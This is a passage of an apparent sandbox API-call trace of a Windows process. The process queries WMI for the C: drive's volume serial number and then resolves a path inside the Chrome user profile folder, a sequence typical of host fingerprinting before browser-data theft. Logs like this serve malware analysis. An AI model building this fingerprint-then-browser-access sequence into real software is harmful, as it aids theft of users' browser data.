[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0195.809] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x2 [0195.809] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x1 [0195.809] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0195.809] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0195.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x60312e0) returned 0x0 [0195.809] WbemDefPath:IUnknown:AddRef (This=0x60312e0) returned 0x3 [0195.809] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x2 [0195.809] WbemDefPath:IWbemPath:SetText (This=0x60312e0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.809] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60312e0, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0195.809] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0195.809] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.810] WbemDefPath:IWbemPath:GetInfo (in: This=0x60312e0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0195.810] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60312e0, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0195.810] WbemDefPath:IWbemPath:GetInfo (in: This=0x60312e0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0195.810] WbemDefPath:IWbemPath:GetInfo (in: This=0x60312e0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0195.810] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60312e0, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0195.810] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0195.810] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0195.810] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.810] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0195.810] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0195.810] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0195.810] IUnknown:Release (This=0xb51e34) returned 0x1 [0195.811] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x60278b0) returned 0x0 [0195.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x60278b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0195.811] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60278b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x6031350) returned 0x0 [0195.811] WbemDefPath:IUnknown:Release (This=0x60278b0) returned 0x0 [0195.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x6031350) returned 0x0 [0195.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0195.811] WbemDefPath:IUnknown:AddRef (This=0x6031350) returned 0x3 [0195.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0195.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0195.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0xbe2600) returned 0x0 [0195.811] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2600, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.811] WbemDefPath:IUnknown:Release (This=0xbe2600) returned 0x3 [0195.811] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0195.811] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0195.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0195.811] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x2 [0195.811] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x1 [0195.811] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0195.811] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0195.811] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x6031350) returned 0x0 [0195.811] WbemDefPath:IUnknown:AddRef (This=0x6031350) returned 0x3 [0195.811] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x2 [0195.812] WbemDefPath:IWbemPath:SetText (This=0x6031350, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0195.812] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031350, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0195.812] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0195.812] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.812] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0195.812] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0195.812] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0195.812] IUnknown:Release (This=0xb51e34) returned 0x1 [0195.812] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x6023d50) returned 0x0 [0195.812] WbemLocator:IUnknown:QueryInterface (in: This=0x6023d50, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0195.812] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023d50, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x6027650) returned 0x0 [0195.812] WbemLocator:IUnknown:Release (This=0x6023d50) returned 0x0 [0195.812] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x6027650) returned 0x0 [0195.813] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0195.813] WbemLocator:IUnknown:AddRef (This=0x6027650) returned 0x3 [0195.813] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0195.813] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0195.813] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0195.813] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0195.813] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0195.813] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0195.813] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x2 [0195.813] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x1 [0195.813] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0195.813] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0195.813] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x6027650) returned 0x0 [0195.813] WbemLocator:IUnknown:AddRef (This=0x6027650) returned 0x3 [0195.813] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x2 [0195.813] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031350, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0195.813] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0195.813] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.813] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x6027660) returned 0x0 [0195.813] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027660, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x603305c) returned 0x0 [0196.325] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5a9b4) returned 0x0 [0196.325] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a9b4, pProxy=0x603305c, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0196.325] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x1 [0196.325] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5a9d4) returned 0x0 [0196.325] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5a9b4) returned 0x0 [0196.325] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a9b4, pProxy=0x603305c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0196.325] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x2 [0196.325] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0196.325] CoTaskMemFree (pv=0xbd4a38) [0196.326] WbemLocator:IUnknown:Release (This=0x6027660) returned 0x0 [0196.326] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5a9d4) returned 0x0 [0196.326] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0196.326] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0196.326] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0196.326] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0196.327] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0196.327] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5a934) returned 0x0 [0196.327] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a934, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.327] WbemLocator:IUnknown:Release (This=0xb5a934) returned 0x3 [0196.327] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0196.327] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0196.327] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5a9bc) returned 0x0 [0196.327] WbemLocator:IRpcOptions:Query (in: This=0xb5a9bc, pPrx=0xb5a9d4, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0196.327] WbemLocator:IUnknown:Release (This=0xb5a9bc) returned 0x3 [0196.327] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0196.327] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0196.327] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0196.328] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x603305c) returned 0x0 [0196.328] WbemLocator:IUnknown:AddRef (This=0x603305c) returned 0x4 [0196.328] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x3 [0196.328] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x2 [0196.328] SysStringLen (param_1=0x0) returned 0x0 [0196.328] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60312e0, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0196.328] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0196.328] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.328] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0196.328] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0196.328] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5a9d4) returned 0x0 [0196.328] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x3 [0196.328] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0196.328] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0196.328] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.328] IWbemServices:GetObject (in: This=0x603305c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x60287e0, ppCallResult=0x0) returned 0x0 [0196.594] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031350, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0196.594] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0196.594] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.594] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36b170c*=0, plFlavor=0x36b1710*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36b170c*=8, plFlavor=0x36b1710*=0) returned 0x0 [0196.594] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.594] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.594] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36b170c*=8, plFlavor=0x36b1710*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36b170c*=8, plFlavor=0x36b1710*=0) returned 0x0 [0196.594] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.594] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", lpFilePart=0x0) returned 